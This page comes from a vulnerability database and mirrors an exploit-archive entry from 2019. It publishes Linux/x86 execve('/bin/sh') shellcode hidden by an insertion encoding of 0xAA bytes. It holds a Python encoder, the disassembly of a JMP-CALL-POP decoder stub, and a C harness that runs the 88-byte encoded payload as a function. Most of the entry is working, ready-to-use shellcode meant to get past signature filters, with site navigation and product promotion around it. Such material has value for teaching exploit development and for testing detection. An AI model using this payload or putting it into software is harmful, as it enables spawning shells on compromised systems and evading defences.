Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)

🗓️ 10 Mar 2019 00:00:00Reported by Daniele VottaType 
zdt
 zdt🔗 0day.today👁 225 Views

This program encodes shellcode with insertion technique and decodes it afterwards

Code
/*
'''
; Date: 07/03/2019
; Insertion-Encoder.asm
; Author: Daniele Votta
; Description: This program encode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
'''

#!/usr/bin/python
# Python Insertion Encoder

import random

# Execve /bin/sh (25 bytes)
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode...'

for x in bytearray(shellcode):
	# Insertion Encoding
	encoded += '\\x'
	encoded += '%02x' % x
	encoded += '\\x%02x' % 0xAA
	# encoded += '\\x%02x' % random.randint(1,255)

	encoded2 += '0x'
	encoded2 += '%02x,' % x
	encoded2 += '0x%02x,' % 0xAA
	# encoded2 += '0x%02x' % random.randint(1,255)

print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/

#include<stdio.h>
#include<string.h>

/*
; Insertion-Decoder.asm
; Author: Daniele Votta
; Description: This program decode shellcode with insertion technique (0xAA).
; Tested on: i686 GNU/Linux
; Shellcode Length:50
; JMP | CALL | POP | Techniques

Insertion-Decoder:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:	eb 1d                	jmp    804809f <call_decoder>

08048082 <decoder>:
 8048082:	5e                   	pop    esi
 8048083:	8d 7e 01             	lea    edi,[esi+0x1]
 8048086:	31 c0                	xor    eax,eax
 8048088:	b0 01                	mov    al,0x1
 804808a:	31 db                	xor    ebx,ebx

0804808c <decode>:
 804808c:	8a 1c 06             	mov    bl,BYTE PTR [esi+eax*1]
 804808f:	80 f3 aa             	xor    bl,0xaa
 8048092:	75 10                	jne    80480a4 <EncodedShellcode>
 8048094:	8a 5c 06 01          	mov    bl,BYTE PTR [esi+eax*1+0x1]
 8048098:	88 1f                	mov    BYTE PTR [edi],bl
 804809a:	47                   	inc    edi
 804809b:	04 02                	add    al,0x2
 804809d:	eb ed                	jmp    804808c <decode>

0804809f <call_decoder>:
 804809f:	e8 de ff ff ff       	call   8048082 <decoder>

080480a4 <EncodedShellcode>:
 80480a4:	31 aa c0 aa 50 aa    	xor    DWORD PTR [edx-0x55af5540],ebp
 80480aa:	68 aa 2f aa 2f       	push   0x2faa2faa
 80480af:	aa                   	stos   BYTE PTR es:[edi],al
 80480b0:	73 aa                	jae    804805c <_start-0x24>
 80480b2:	68 aa 68 aa 2f       	push   0x2faa68aa
 80480b7:	aa                   	stos   BYTE PTR es:[edi],al
 80480b8:	62 aa 69 aa 6e aa    	bound  ebp,QWORD PTR [edx-0x55915597]
 80480be:	89 aa e3 aa 50 aa    	mov    DWORD PTR [edx-0x55af551d],ebp
 80480c4:	89 aa e2 aa 53 aa    	mov    DWORD PTR [edx-0x55ac551e],ebp
 80480ca:	89 aa e1 aa b0 aa    	mov    DWORD PTR [edx-0x554f551f],ebp
 80480d0:	0b aa cd aa 80 aa    	or     ebp,DWORD PTR [edx-0x557f5533]
 80480d6:	bb                   	.byte 0xbb
 80480d7:	bb                   	.byte 0xbb
[+] Extract Shellcode ... 
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"

======================= POC Daniele Votta =======================
*/

/* Insertion Encoded Execve /bin/sh (88 bytes) */
unsigned char code[] = \
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb";

int main()
{
	printf("Shellcode Length:  %d\n", strlen(code));
	int (*ret)() = (int(*)())code;
	ret();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2019 00:00Current
7.4High risk
Vulners AI Score7.4
insertion techniqueshellcodedecoderlinux/x86execvedaniele vottaasminsertion encoderinsertion decoder
225